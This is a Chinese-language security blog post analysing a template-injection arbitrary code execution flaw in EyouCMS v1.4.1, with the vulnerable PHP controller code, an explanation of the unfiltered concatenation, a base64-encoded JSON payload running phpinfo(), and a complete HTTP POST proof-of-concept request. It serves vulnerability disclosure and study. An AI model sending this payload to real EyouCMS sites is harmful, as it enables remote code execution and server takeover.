EyouCMS v1.4.1 任意代码执行

LuckySec

发布于 2022-11-02 13:46:00

8540

发布于 2022-11-02 13:46:00

文章被收录于专栏：LuckySec网络安全

0x001 EyouCMS

EyouCMS是基于TP5.0框架为核心开发的免费+开源的企业内容管理系统，专注企业建站用户需求

提供海量各行业模板，降低中小企业网站建设、网络营销成本，致力于打造用户舒适的建站体验

EyouCMS v1.4.1 源码下载发布时间：2019-11-12

0x002 漏洞代码

漏洞代码文件位置：\EyouCMS\application\api\controller\Ajax.php

/**
 * 获取会员列表
 * @author 小虎哥 by 2018-4-20
 */
public function get_tag_memberlist()
{
    // https://gitee.com/weng_xianhu/eyoucms/issues/I15J1A
    # $this->success('此代码有安全漏洞！');

    if (IS_AJAX_POST) {
        $htmlcode = input('post.htmlcode/s');
        $htmlcode = htmlspecialchars_decode($htmlcode);

        $attarray = input('post.attarray/s');
        $attarray = htmlspecialchars_decode($attarray);
        $attarray = json_decode(base64_decode($attarray));

        /*拼接完整的memberlist标签语法*/
        $innertext = "{eyou:memberlist";
        foreach ($attarray as $key => $val) {
            if (in_array($key, ['js'])) {
                continue;
            }
            $innertext .= " {$key}='{$val}'";
        }
        $innertext .= " js='on'}";
        $innertext .= $htmlcode;
        $innertext .= "{/eyou:memberlist}";
        /*--end*/
        $msg = $this->display($innertext); // 渲染模板标签语法
        $data['msg'] = $msg;

        $this->success('读取成功！', null, $data);
    }
    $this->error('加载失败！');
}

0x003 漏洞分析

造成该漏洞的主要原因是以下这段代码的拼接操作，在接收POST参数时，只是简单的对POST参数进行base64加解密操作，并未对接收参数值进行安全过滤，直接将其拼接到源代码中，随后对代码对拼接后的语句进行模板渲染。

$attarray = input('post.attarray/s');
$attarray = htmlspecialchars_decode($attarray);
$attarray = json_decode(base64_decode($attarray));

$innertext = "{eyou:memberlist";
foreach ($attarray as $key => $val) {
    if (in_array($key, ['js'])) {
        continue;
    }
    $innertext .= " {$key}='{$val}'";
}
$innertext .= " js='on'}";

程序先将我们POST输入的attarray进行base64解密后与{eyou:memberlist进行拼接，最终形成类似这种形式：

{eyou:memberlist $key='$val' js='on'}

这里通过}来闭合前面的{eyou:memberlist达到任意代码执行的问题。因为解析的是json我们只需输入类似

{"}":"{php}phpinfo();{\/php}"}

将上诉利用代码进行base64编码后，即可达到任意代码执行的目的。

eyJ9Ijoie3BocH1waHBpbmZvKCk7e1wvcGhwfSJ9

0x004 漏洞触发

首先，分析确定该漏洞代码的触发条件：

if (IS_AJAX_POST) {

只要在数据包的HTTP Header中加入以下代码，即可触发漏洞条件。

X-Requested-With: XMLHttpRequest

POC:

POST /cms/EyouCMS/index.php?m=api&c=Ajax&a=get_tag_memberlist HTTP/1.1
Host: 127.0.0.1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
X-Requested-With: XMLHttpRequest

attarray=eyJ9Ijoie3BocH1waHBpbmZvKCk7e1wvcGhwfSJ9